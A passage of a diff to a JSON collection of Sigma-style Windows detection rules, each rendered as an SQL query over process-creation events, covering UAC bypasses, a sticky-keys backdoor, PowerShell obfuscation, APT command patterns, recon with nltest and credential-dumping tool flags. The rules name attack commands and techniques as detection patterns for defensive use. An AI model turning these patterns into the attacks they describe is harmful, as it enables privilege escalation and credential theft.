"proc_creation_win_uac_bypass_wsreset_integrity_level.yml" }, { - "title": "Potential PowerShell Obfuscation Via Reversed Commands", - "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", - "status": "test", - "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "title": "PUA - Process Hacker / System Informer Execution", + "id": "811e0002-b13b-4a15-9d00-a613fce66e42", + "status": "experimental", + "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Sometimes used by developers or system administrators for debugging purposes" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" + ], + "filename": "proc_creation_win_pua_process_hacker.yml" + }, + { + "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", + "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", + "status": "experimental", + "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" + "filename": "proc_creation_win_net_use_mount_internet_share.yml" }, { - "title": "UNC2452 PowerShell Pattern", - "id": "b7155193-8a81-4d8f-805d-88de864ca50c", - "status": "test", - "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Schtasks Schedule Types", + "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "status": "experimental", + "description": "Detects scheduled task creations or modification on a suspicious schedule type", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.t1047" + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Legitimate processes that run at logon. Filter according to your environment" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Invoke-WMIMethod win32\\_process -name create -argumentlist%' ESCAPE '\\' AND CommandLine LIKE '%rundll32 c:\\\\windows%' ESCAPE '\\') OR (CommandLine LIKE '%wmic /node:%' ESCAPE '\\' AND CommandLine LIKE '%process call create \"rundll32 c:\\\\windows%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_apt_unc2452_ps.yml" + "filename": "proc_creation_win_schtasks_schedule_type.yml" }, { - "title": "Schtasks From Suspicious Folders", - "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", + "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", + "id": "5b768e71-86f2-4879-b448-81061cbae951", "status": "experimental", - "description": "Detects scheduled task creations that have suspicious action command and folder combinations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_folder_combos.yml" + "filename": "proc_creation_win_net_default_accounts_manipulation.yml" }, { - "title": "Potential EmpireMonkey Activity", - "id": "10152a7b-b566-438f-a33c-390b607d1c8d", + "title": "Potential Recon Activity Via Nltest.EXE", + "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", "status": "experimental", - "description": "Detects potential EmpireMonkey APT activity", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects nltest commands that can be used for information discovery", + "author": "Craig Young, oscd.community, Georg Lauenstein", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.discovery", + "attack.t1016", + "attack.t1482" ], "falsepositives": [ - "Unlikely" + "Legitimate administration use but user and host must be investigated" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%/e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Local\\\\Temp\\\\Errors.bat%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_empiremonkey.yml" + "filename": "proc_creation_win_nltest_recon.yml" }, { - "title": "Potential MuddyWater APT Activity", - "id": "36222790-0d43-4fe8-86e4-674b27809543", + "title": "UAC Bypass Using ChangePK and SLUI", + "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", "status": "test", - "description": "Detects potential Muddywater APT activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.g0069" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_apt_muddywater_activity.yml" + "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" }, { - "title": "HackTool - Sliver C2 Implant Activity Pattern", - "id": "42333b2c-b425-441c-b70e-99404a17170f", + "title": "Execution from Suspicious Folder", + "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", "status": "experimental", - "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects a suspicious execution from an uncommon folder", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" + "filename": "proc_creation_win_susp_execution_path.yml" }, { - "title": "Whoami.EXE Execution Anomaly", - "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "title": "Persistence Via Sticky Key Backdoor", + "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", "status": "experimental", - "description": "Detects the execution of whoami.exe with suspicious parent processes.", - "author": "Florian Roth (Nextron Systems)", + "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", + "author": "Sreeman", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.t1546.008", + "attack.privilege_escalation" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentProcessName = '') OR (ParentProcessName = '')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_whoami_parent_anomaly.yml" + "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" }, { - "title": "Potential Commandline Obfuscation Using Unicode Characters", - "id": "e0552b19-5a83-4222-b141-b36184bb8d79", + "title": "Suspicious Compression Tool Parameters", + "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", "status": "test", - "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": "Detects suspicious command line arguments of common data compression tools", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE 'C:\\\\Program%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" + "filename": "proc_creation_win_susp_compression_params.yml" }, { - "title": "Script Interpreter Execution From Suspicious Folder", - "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "title": "Potential MsiExec Masquerading", + "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", "status": "test", - "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", + "description": "Detects the execution of msiexec.exe from an uncommon directory", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (NewProcessName LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" + "filename": "proc_creation_win_msiexec_masquerading.yml" }, { - "title": "HackTool - Koadic Execution", - "id": "5cddf373-ef00-4112-ad72-960ac29bac34", - "status": "test", - "description": "Detects command line parameters used by Koadic hack tool", - "author": "wagga, Jonhnathan Ribeiro, oscd.community", + "title": "Suspicious Regsvr32 Execution From Remote Share", + "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "status": "experimental", + "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_koadic.yml" + "filename": "proc_creation_win_regsvr32_remote_share.yml" }, { - "title": "ImagingDevices Unusual Parent/Child Processes", - "id": "f11f2808-adb4-46c0-802a-8660db50fa99", - "status": "experimental", - "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Bypass UAC via WSReset.exe", + "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "status": "test", + "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.execution" + "attack.t1548.002" ], "falsepositives": [ - "Unknown" + "Unknown sub processes of Wsreset.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" ], - "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" + "filename": "proc_creation_win_uac_bypass_wsreset.yml" }, { - "title": "HackTool - Quarks PwDump Execution", - "id": "0685b176-c816-4837-8e7b-1216f346636b", - "status": "experimental", - "description": "Detects usage of the Quarks PwDump tool via commandline arguments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DumpStack.log Defender Evasion", + "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", + "status": "test", + "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" ], - 